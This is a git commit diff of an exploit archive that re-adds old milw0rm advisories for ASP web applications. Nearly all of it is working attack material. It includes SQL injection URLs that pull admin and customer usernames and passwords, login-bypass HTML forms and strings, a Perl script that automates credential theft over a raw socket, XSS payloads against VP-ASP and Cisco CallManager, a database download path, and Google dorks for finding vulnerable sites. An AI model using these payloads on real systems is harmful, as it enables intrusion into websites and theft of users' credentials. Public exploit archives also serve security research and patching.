Updated 12_08_2013

This commit is contained in:
Offensive Security 2013-12-08 16:08:13 +00:00
parent 2039e282e8
commit 5a468df6b9
383 changed files with 31976 additions and 28274 deletions

4031
files.csv

File diff suppressed because it is too large Load diff

View file

@ -1,37 +1,37 @@
<!--
Vulnerable products :
webwiz site news access2000 : vesion 3.06 and prior versions
webwiz journal access2000 : version 1.0
webwiz weekly poll access2000 : version 3.06 and prior versions
database login access2000 : version 1.71 and prior versions
webwiz site news access97 : version 3.06 and prior versions
webwiz journal access97 : version 1.0
webwiz weekly poll access97 : version 3.06 and prior versions
database login access97 : version 1.71 and prior versions
Proof of Concepts :
-->
<html>
<h1>WebWiz Scripts Login Bypass PoC - site news , journal , weekly poll - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers Institute of Iran</a></p>
<form method="POST" action="http://target/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="'union all select '1','1' from tblConfiguration where ''='">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>
<html>
<h1>WebWiz Login Bypass PoC - Database login - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers Institute of Iran</a></p>
<form method="POST" action="http://target/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="'union select 1 from tblusers where''='">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>
# milw0rm.com [2005-12-30]
<!--
Vulnerable products :
webwiz site news access2000 : vesion 3.06 and prior versions
webwiz journal access2000 : version 1.0
webwiz weekly poll access2000 : version 3.06 and prior versions
database login access2000 : version 1.71 and prior versions
webwiz site news access97 : version 3.06 and prior versions
webwiz journal access97 : version 1.0
webwiz weekly poll access97 : version 3.06 and prior versions
database login access97 : version 1.71 and prior versions
Proof of Concepts :
-->
<html>
<h1>WebWiz Scripts Login Bypass PoC - site news , journal , weekly poll - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers Institute of Iran</a></p>
<form method="POST" action="http://target/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="'union all select '1','1' from tblConfiguration where ''='">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>
<html>
<h1>WebWiz Login Bypass PoC - Database login - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers Institute of Iran</a></p>
<form method="POST" action="http://target/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="'union select 1 from tblusers where''='">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>
# milw0rm.com [2005-12-30]

View file

@ -1,19 +1,19 @@
################################################################################
## ##
## Icblogger <= "YID" Remote Blind SQL Injection ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## Credit by | Chironex Fleckeri ##
## Mail | ChironeX.FleckeriX@Gmail.Com ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## ##
################################################################################
##########################################################################################################################################################################
#Usage : http://www.target.com/path/devam.asp?YID=-1 UNION SELECT null,null,null,null,null,editor_adi,null,editor_sifre,editor_mail,null FROM editor WHERE editor_id = 1 #
##########################################################################################################################################################################
#############################################################
#Admin Panel : http://www.target.com/path/admin/default.asp #
#############################################################
# milw0rm.com [2006-09-01]
################################################################################
## ##
## Icblogger <= "YID" Remote Blind SQL Injection ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## Credit by | Chironex Fleckeri ##
## Mail | ChironeX.FleckeriX@Gmail.Com ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## ##
################################################################################
##########################################################################################################################################################################
#Usage : http://www.target.com/path/devam.asp?YID=-1 UNION SELECT null,null,null,null,null,editor_adi,null,editor_sifre,editor_mail,null FROM editor WHERE editor_id = 1 #
##########################################################################################################################################################################
#############################################################
#Admin Panel : http://www.target.com/path/admin/default.asp #
#############################################################
# milw0rm.com [2006-09-01]

View file

@ -1,20 +1,20 @@
+++++++++++++++++++++++++++++++++++++++++++++++++++
+ Haberx v1.1 (tr) SQL Injection Vulnerability +
+ Author : Fix TR +
+ Site : www.hack.gen.tr +
+ Contact : fixtr[at]bsdmail.com +
+++++++++++++++++++++++++++++++++++++++++++++++++++
+ Download: http://www.aspindir.com/Goster/3983
+ Versions: 1.02 between 1.1
+ Bug In : kategorix.asp
+ Risk : High
+ Admin Nick:
http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_adi,1+from+uyex+where+uyex_id=1
+ Admin Password: (Big Letters)
http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_sifre,1+from+uyex+where+uyex_id=1
# milw0rm.com [2006-09-15]
+++++++++++++++++++++++++++++++++++++++++++++++++++
+ Haberx v1.1 (tr) SQL Injection Vulnerability +
+ Author : Fix TR +
+ Site : www.hack.gen.tr +
+ Contact : fixtr[at]bsdmail.com +
+++++++++++++++++++++++++++++++++++++++++++++++++++
+ Download: http://www.aspindir.com/Goster/3983
+ Versions: 1.02 between 1.1
+ Bug In : kategorix.asp
+ Risk : High
+ Admin Nick:
http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_adi,1+from+uyex+where+uyex_id=1
+ Admin Password: (Big Letters)
http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_sifre,1+from+uyex+where+uyex_id=1
# milw0rm.com [2006-09-15]

View file

@ -1,41 +1,41 @@
Vulnerability Report
*******************************************************************************
# Title : Charon Cart v3(Review.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page : http://www.charon.co.uk
# Exploit;
*******************************************************************************
###http://[target]/[path]/Review.asp?ProductID=[SQL HERE]
Example:
//Review.asp?ProductID=-1%20union%20select%20CustomerPassword%20from%20Customers%20Where%20CustomerID%20=%201
//Review.asp?ProductID=-1%20union%20select%20CustomerEmail%20from%20Customers%20Where%20CustomerID%20=%201
Email and Password ==> login.asp [L0gin P4Ge]
Columns;
"""""""""""""""""""""
CustomerID
"""""""""""""""""""""
CustomerEmail
"""""""""""""""""""""
CustomerPassword
"""""""""""""""""""""
ShipCountry
"""""""""""""""""""""
Phone
"""""""""""""""""""""
.........
"""""""""""""""""""""
....
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-09-17]
Vulnerability Report
*******************************************************************************
# Title : Charon Cart v3(Review.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page : http://www.charon.co.uk
# Exploit;
*******************************************************************************
###http://[target]/[path]/Review.asp?ProductID=[SQL HERE]
Example:
//Review.asp?ProductID=-1%20union%20select%20CustomerPassword%20from%20Customers%20Where%20CustomerID%20=%201
//Review.asp?ProductID=-1%20union%20select%20CustomerEmail%20from%20Customers%20Where%20CustomerID%20=%201
Email and Password ==> login.asp [L0gin P4Ge]
Columns;
"""""""""""""""""""""
CustomerID
"""""""""""""""""""""
CustomerEmail
"""""""""""""""""""""
CustomerPassword
"""""""""""""""""""""
ShipCountry
"""""""""""""""""""""
Phone
"""""""""""""""""""""
.........
"""""""""""""""""""""
....
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-09-17]

View file

@ -1,19 +1,19 @@
*******************************************************************************
# Title : Estate Agent Manager <= v1.3 (default.asp) Remote Login ByPass SQL Injection Vulnerability
# Author : ajann
*******************************************************************************
Example:
###http://[target]/[path]/admin/
UserName: ' union select 0,0 from admin
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-13]
*******************************************************************************
# Title : Estate Agent Manager <= v1.3 (default.asp) Remote Login ByPass SQL Injection Vulnerability
# Author : ajann
*******************************************************************************
Example:
###http://[target]/[path]/admin/
UserName: ' union select 0,0 from admin
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-13]

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24033/info
VP-ASP Shopping Cart is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
VP-ASP Shopping Cart 6.50 is vulnerable; other versions may also be affected.
<!-- VP-ASP Shopping Cart 6.50 - Cross-Site Scripting Vulnerability A cross-site scripting vulnerability in VP-ASP Shopping Cart 6.50 was discovered. The vendor, VP-ASP, shipped an official patch on May 16th, 2007. Vulnerable Variable: type Vulnerable File: shopcontent.asp Vulnerable: VP-ASP Shopping Cart 6.50 (other versions should also be vulnerable) Google d0rk: intitle:"VP-ASP Shopping Cart 6.50" John Martinelli john@martinelli.com RedLevel Security http://www.RedLevel.org May 16th, 2007 !--> <html> <head><title>VP-ASP Shopping Cart 6.50 - Cross-Site Scripting Vulnerability</title><body> <center><br><br> <font size=4>VP-ASP Shopping Cart 6.50 - Cross-Site Scripting Vulnerability</font><br> <font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a> of <a href="http://redlevel.org">RedLevel Security</a><br><br> Google d0rk: <a href="http://www.google.com/search?q=intitle%3A%22VP-ASP+Shopping+Cart+6.50%22">intitle:"VP-ASP Shopping Cart 6.50"</a> </font><br><br><br> <center>file <b>shopcontent.asp</b> - variable <b>type</b> - method <b>get</b></center><br> <form action="http://www.example.com/shop/shopcontent.asp" method="get"> <input size=75 name="type" value="<body onload=alert(1)>"> <input type=submit value="Execute XSS Attack" class="button"> </form> <br><br><br> </form> </body></html>

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24119/info
Cisco CallManager is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting this vulnerability could allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
Cisco CallManager 4.1.1 is reported vulnerable; other versions may also be affected.
https://www.example.com/CCMAdmin/serverlist.asp?findBy=servername&match=begins&pattern=[xss]

View file

@ -1,103 +1,103 @@
#!/usr/bin/perl
#[Script Name: Click N' Print Coupons <= V2005.01 (key) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
#[S.Page : http://www.websitedesignsforless.com
#[$$ : $9.95
#[Message : Tum Musluman Aleminin Kurban Bayrami Mubarek Olsun #..
#[.. : ajann,Turkey
# 2006.01 //coupon_detail.asp?key=-1%20union%20select%200,0,xusername,0,0,xpassword,0,0,0,0,0,0,0,0,0%20from%20login%20where%20id%20like%201
use IO::Socket;
if(@ARGV < 1){
print "
[========================================================================
[// Click N' Print Coupons <= V2005.01 (key) Remote SQL Injection Exploit
[// Usage: exploit.pl [target]
[// Example: exploit.pl victim.com
[// Example: exploit.pl victim.com
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$file = "/coupon_detail.asp?key=";
print "Script <DIR> : ";
$dir = <STDIN>;
chop ($dir);
if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}
if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
}
print "User <ID> : ";
$ID = <STDIN>;
chop ($ID);
if ($ID =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}
$len=length($ID);
if ($len == 1){}
else {
print "-- Exploit Failed[No User Id] \n";
exit();
}
$target = "-1%20union%20select%200,0,0,xusername,xpassword,0,0,0,0,0,0,0,0,0%20from%20login%20where%20id%20like%20".$ID;
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /color=\"#FF0000\">(.*?)<\/font>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}
if ($answer =~ /<font size=\"4\"><b>(.*?)<br>/){
print "+ Password: $1\n";
}
if ($answer =~ /Syntax error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
# milw0rm.com [2006-12-30]
#!/usr/bin/perl
#[Script Name: Click N' Print Coupons <= V2005.01 (key) Remote SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
#[S.Page : http://www.websitedesignsforless.com
#[$$ : $9.95
#[Message : Tum Musluman Aleminin Kurban Bayrami Mubarek Olsun #..
#[.. : ajann,Turkey
# 2006.01 //coupon_detail.asp?key=-1%20union%20select%200,0,xusername,0,0,xpassword,0,0,0,0,0,0,0,0,0%20from%20login%20where%20id%20like%201
use IO::Socket;
if(@ARGV < 1){
print "
[========================================================================
[// Click N' Print Coupons <= V2005.01 (key) Remote SQL Injection Exploit
[// Usage: exploit.pl [target]
[// Example: exploit.pl victim.com
[// Example: exploit.pl victim.com
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$file = "/coupon_detail.asp?key=";
print "Script <DIR> : ";
$dir = <STDIN>;
chop ($dir);
if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}
if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
}
print "User <ID> : ";
$ID = <STDIN>;
chop ($ID);
if ($ID =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}
$len=length($ID);
if ($len == 1){}
else {
print "-- Exploit Failed[No User Id] \n";
exit();
}
$target = "-1%20union%20select%200,0,0,xusername,xpassword,0,0,0,0,0,0,0,0,0%20from%20login%20where%20id%20like%20".$ID;
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /color=\"#FF0000\">(.*?)<\/font>/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}
if ($answer =~ /<font size=\"4\"><b>(.*?)<br>/){
print "+ Password: $1\n";
}
if ($answer =~ /Syntax error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
# milw0rm.com [2006-12-30]

View file

@ -1,25 +1,25 @@
*******************************************************************************
# Title : ASP NEWS <= V3 (news_detail.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://www.planetgraphic.de/
*******************************************************************************
[[SQL]]]---------------------------------------------------------
http://[target]/[path]//news_detail.asp?id=[SQL]
Example:
//news_detail.asp?id=-1%20union%20select%200,username,password,0,0,0%20from%20tblusers
[[/SQL]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2007-01-24]
*******************************************************************************
# Title : ASP NEWS <= V3 (news_detail.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://www.planetgraphic.de/
*******************************************************************************
[[SQL]]]---------------------------------------------------------
http://[target]/[path]//news_detail.asp?id=[SQL]
Example:
//news_detail.asp?id=-1%20union%20select%200,username,password,0,0,0%20from%20tblusers
[[/SQL]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2007-01-24]

View file

@ -1,26 +1,26 @@
*******************************************************************************
# Title : makit news/blog poster <=v3(news_page.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://www.makit.net
# $$ : Free
*******************************************************************************
[[SQL]]]---------------------------------------------------------
http://[target]/[path]//news_page.asp?uid=[SQL]
Example:
//news_page.asp?uid=-1'%20union%20select%200,0,0,uname,pword,0,0,0%20from%20users%20where%20'1=1
[[/SQL]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2007-01-25]
*******************************************************************************
# Title : makit news/blog poster <=v3(news_page.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://www.makit.net
# $$ : Free
*******************************************************************************
[[SQL]]]---------------------------------------------------------
http://[target]/[path]//news_page.asp?uid=[SQL]
Example:
//news_page.asp?uid=-1'%20union%20select%200,0,0,uname,pword,0,0,0%20from%20users%20where%20'1=1
[[/SQL]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2007-01-25]

View file

@ -1,30 +1,30 @@
=================================X=O=R=O=N=================================
Snitz Forums 2000 Version 3.1 SR4 (pop_profile.asp) Remote SQL Injection Vulnerability
=================================X=O=R=O=N=================================
Bulan: xoron
xoron.info - xoron.biz
=================================X=O=R=O=N=================================
POC: pop_profile.asp?mode=display&id=[SQL-INJ]
=================================X=O=R=O=N=================================
Username:
pop_profile.asp?mode=display&id=1
Pass:
pop_profile.asp?mode=display&id=-1+union+all+select+0,M_PASSWORD,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+FORUM_MEMBERS
=================================X=O=R=O=N=================================
Thanx: str0ke, kacper, shika
Tesekkurler: pang0, chaos, can bjorn, DJR
=================================X=O=R=O=N=================================
# milw0rm.com [2007-02-16]
=================================X=O=R=O=N=================================
Snitz Forums 2000 Version 3.1 SR4 (pop_profile.asp) Remote SQL Injection Vulnerability
=================================X=O=R=O=N=================================
Bulan: xoron
xoron.info - xoron.biz
=================================X=O=R=O=N=================================
POC: pop_profile.asp?mode=display&id=[SQL-INJ]
=================================X=O=R=O=N=================================
Username:
pop_profile.asp?mode=display&id=1
Pass:
pop_profile.asp?mode=display&id=-1+union+all+select+0,M_PASSWORD,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+FORUM_MEMBERS
=================================X=O=R=O=N=================================
Thanx: str0ke, kacper, shika
Tesekkurler: pang0, chaos, can bjorn, DJR
=================================X=O=R=O=N=================================
# milw0rm.com [2007-02-16]

View file

@ -1,44 +1,44 @@
[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
[~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
[~]Vendor:www.activewebsoftwares.com
[~]Software: Active Force Matrix v 2
[~]author: ((я3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] -----------------------------------------------------------
[~] Exploit:
username: r0' or ' 1=1--
password: r0' or ' 1=1--
[~]login 4 d3m0:
http://www.activewebsoftwares.com/demoactiveforcematrix/account.asp
[~]--------------------------------------------------------------------------------
[~] Greetz tO: {str0ke} &keta &m4n0n & maxmos & EV!L KS@ & hesham_hacker &الزهيري
[~]
[~] spechial thanks : dolly & 7am3m & عماد & {str0ke}
[~]
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~] xp10.biz & ahacker.biz
[~]
[~]--------------------------------------------------------------------------------
# milw0rm.com [2008-11-29]
[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
[~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
[~]Vendor:www.activewebsoftwares.com
[~]Software: Active Force Matrix v 2
[~]author: ((я3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] -----------------------------------------------------------
[~] Exploit:
username: r0' or ' 1=1--
password: r0' or ' 1=1--
[~]login 4 d3m0:
http://www.activewebsoftwares.com/demoactiveforcematrix/account.asp
[~]--------------------------------------------------------------------------------
[~] Greetz tO: {str0ke} &keta &m4n0n & maxmos & EV!L KS@ & hesham_hacker &الزهيري
[~]
[~] spechial thanks : dolly & 7am3m & عماد & {str0ke}
[~]
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~] xp10.biz & ahacker.biz
[~]
[~]--------------------------------------------------------------------------------
# milw0rm.com [2008-11-29]

View file

@ -1,15 +1,15 @@
#########################################################
---------------------------------------------------------
Portal Name: Discussion Web
Version : 4.0
Vendor : http://www.takempis.com/aboutdiscussion.htm
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (DD)
---------------------------------------------------------
#########################################################
[DD]:
http://site.com/[Path]/_private/discussion.mdb
---------------------------------
# milw0rm.com [2008-12-14]
#########################################################
---------------------------------------------------------
Portal Name: Discussion Web
Version : 4.0
Vendor : http://www.takempis.com/aboutdiscussion.htm
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (DD)
---------------------------------------------------------
#########################################################
[DD]:
http://site.com/[Path]/_private/discussion.mdb
---------------------------------
# milw0rm.com [2008-12-14]

View file

@ -1,30 +1,30 @@
###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################
#Found By : AlpHaNiX
#website : www.offensivetrack.org
#contact : AlpHa[AT]HACKER[DOT]BZ
###########################################################################
#script : RealtyListing V1/V2
#download : null
#Demo : http://www.aspsiteware.com/Realty1
http://www.aspsiteware.com/realty2/realty2/
###########################################################################
#Exploits :
--=[SQL INJECTION]=--
http://www.aspsiteware.com/Realty1/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users#
http://www.aspsiteware.com/Realty1/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users#
http://www.aspsiteware.com/realty2/realty2/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users
http://www.aspsiteware.com/realty2/realty2/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users
###########################################################################
# milw0rm.com [2008-12-14]
###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################
#Found By : AlpHaNiX
#website : www.offensivetrack.org
#contact : AlpHa[AT]HACKER[DOT]BZ
###########################################################################
#script : RealtyListing V1/V2
#download : null
#Demo : http://www.aspsiteware.com/Realty1
http://www.aspsiteware.com/realty2/realty2/
###########################################################################
#Exploits :
--=[SQL INJECTION]=--
http://www.aspsiteware.com/Realty1/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users#
http://www.aspsiteware.com/Realty1/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users#
http://www.aspsiteware.com/realty2/realty2/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users
http://www.aspsiteware.com/realty2/realty2/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users
###########################################################################
# milw0rm.com [2008-12-14]

View file

@ -1,127 +1,127 @@
*******************************************************************************
# Title : Comersus Shopping Cart <= v6 Remote User Pass Exploit
# Author : "ajann" from Turkey
# Contact : :(
# S.Page : http://www.comersus.com/
# $$ : Free
# Dork : Powered by Comersus v6 Shopping Cart
# DorkEx :
http://www.google.com.tr/search?hl=tr&q=Powered+by+Comersus+v6+Shopping+Cart&btnG=Ara&meta=
KAHROLSUN ISRAEL
-Register Site
-Login
-Open Exploit
-Edit: User Email , User Password
-Submit Form
*******************************************************************************
<form method="post" name="modCust" action="http://target/[path]/comersus_customerModifyExec.asp">
<table width="421" border="0">
<tr>
</tr>
<tr>
<td width="168">Name</td>
<td width="220">
<input type=text name=customerName value="test">
</td>
</tr>
<tr>
<td width="168">Last Name</td>
<td width="220">
<input type=text name=lastName value="test">
</td>
</tr>
<tr>
<td width="168">Company</td>
<td width="220">
<input type=text name=customerCompany value="test">
</td>
</tr>
<tr>
<td width="168">Phone</td>
<td width="220">
<input type=text name=phone value="123456789">
</td>
</tr>
<tr>
<td width="168"><strong>Email</strong></td>
<td width="220">
<input type="text" name="email" value="Please Add Mail">
Edit
</td>
</tr>
<tr>
<td width="168"><strong>Password</strong></td>
<td width="220">
<input type=text name=password value="Please Add Pass">
Edit
</td>
</tr>
<tr>
<td width="168">Address</td>
<td width="220">
<input type=text name=address value="test">
</td>
</tr>
<tr>
<td width="168">Zip</td>
<td width="220">
<input type=text name=zip value="08050">
</td>
</tr>
<tr>
<td width="168">State</td>
<td width="220">
<SELECT name=stateCode size=1>
<OPTION value="">Select the state
<option value="1">Please Type County below
</OPTION>
</SELECT>
</td>
</tr>
<tr>
<td width="168">Non listed state</td>
<td width="220">
<input type=text name=state value="">
</td>
</tr>
<tr>
<td width="168">City</td>
<td width="220">
<input type=text name=city value="test">
</td>
</tr>
<tr>
<td width="168">Country</td>
<td width="220">
<SELECT name=countryCode>
<OPTION value="">Select the country
<option value="AF" selected>AFGHANISTAN
</OPTION>
</SELECT>
</td>
</tr>
<tr>
<td width="168">&nbsp;</td>
<td width="220">&nbsp;</td>
</tr>
<tr>
<td colspan="2">
<input type="submit" name="Modify" value="Modify">
</td>
</tr>
</table>
</form>
# milw0rm.com [2009-01-12]
*******************************************************************************
# Title : Comersus Shopping Cart <= v6 Remote User Pass Exploit
# Author : "ajann" from Turkey
# Contact : :(
# S.Page : http://www.comersus.com/
# $$ : Free
# Dork : Powered by Comersus v6 Shopping Cart
# DorkEx :
http://www.google.com.tr/search?hl=tr&q=Powered+by+Comersus+v6+Shopping+Cart&btnG=Ara&meta=
KAHROLSUN ISRAEL
-Register Site
-Login
-Open Exploit
-Edit: User Email , User Password
-Submit Form
*******************************************************************************
<form method="post" name="modCust" action="http://target/[path]/comersus_customerModifyExec.asp">
<table width="421" border="0">
<tr>
</tr>
<tr>
<td width="168">Name</td>
<td width="220">
<input type=text name=customerName value="test">
</td>
</tr>
<tr>
<td width="168">Last Name</td>
<td width="220">
<input type=text name=lastName value="test">
</td>
</tr>
<tr>
<td width="168">Company</td>
<td width="220">
<input type=text name=customerCompany value="test">
</td>
</tr>
<tr>
<td width="168">Phone</td>
<td width="220">
<input type=text name=phone value="123456789">
</td>
</tr>
<tr>
<td width="168"><strong>Email</strong></td>
<td width="220">
<input type="text" name="email" value="Please Add Mail">
Edit
</td>
</tr>
<tr>
<td width="168"><strong>Password</strong></td>
<td width="220">
<input type=text name=password value="Please Add Pass">
Edit
</td>
</tr>
<tr>
<td width="168">Address</td>
<td width="220">
<input type=text name=address value="test">
</td>
</tr>
<tr>
<td width="168">Zip</td>
<td width="220">
<input type=text name=zip value="08050">
</td>
</tr>
<tr>
<td width="168">State</td>
<td width="220">
<SELECT name=stateCode size=1>
<OPTION value="">Select the state
<option value="1">Please Type County below
</OPTION>
</SELECT>
</td>
</tr>
<tr>
<td width="168">Non listed state</td>
<td width="220">
<input type=text name=state value="">
</td>
</tr>
<tr>
<td width="168">City</td>
<td width="220">
<input type=text name=city value="test">
</td>
</tr>
<tr>
<td width="168">Country</td>
<td width="220">
<SELECT name=countryCode>
<OPTION value="">Select the country
<option value="AF" selected>AFGHANISTAN
</OPTION>
</SELECT>
</td>
</tr>
<tr>
<td width="168">&nbsp;</td>
<td width="220">&nbsp;</td>
</tr>
<tr>
<td colspan="2">
<input type="submit" name="Modify" value="Modify">
</td>
</tr>
</table>
</form>
# milw0rm.com [2009-01-12]

View file

@ -1,44 +1,44 @@
@~~=======================================~~@
====C4TEAM.ORG====ByALBAYX====C4TEAM.ORG=====
@~~=======================================~~@
@~~=Author : ByALBAYX
@~~=Website : WWW.C4TEAM.ORG
@~~=From : Turkish
@~~=======================================~~@
@~~=Script :SkyPortal Downloads Manager v1.1
@~~=S.Site :http://skyportal.net
@~~=Download :http://skyportal.net/downloads/modules/mod_downloads_1_1.zip
@~~=Demo :http://vegtrafikk.net
@~~=======================================~~@
@~~=Vul:
@~~=http://site.com/ [PATH] /admin_dl_browse.asp
@~~=http://site.com/ [PATH] /dl_add_form.asp
@~~=Demo:
@~~=http://vegtrafikk.net/admin_dl_browse.asp
@~~=http://resala2u.com/admin_dl_browse.asp
vs.. vs.. vs..
@~~=======================================~~@
@~~=Greetz For
@~~=Str0ke & Kralman & Mrabah12R & K3vin Mitnick & web-terrorist & Silent & SpotGang
@~~=======================================~~@
Derdimi dinledim, derdimden iGRENDiM...
Onun derdini gordum, derdime iMRENDiM...
FilistiN
@~~=======================================~~@
# milw0rm.com [2009-02-27]
@~~=======================================~~@
====C4TEAM.ORG====ByALBAYX====C4TEAM.ORG=====
@~~=======================================~~@
@~~=Author : ByALBAYX
@~~=Website : WWW.C4TEAM.ORG
@~~=From : Turkish
@~~=======================================~~@
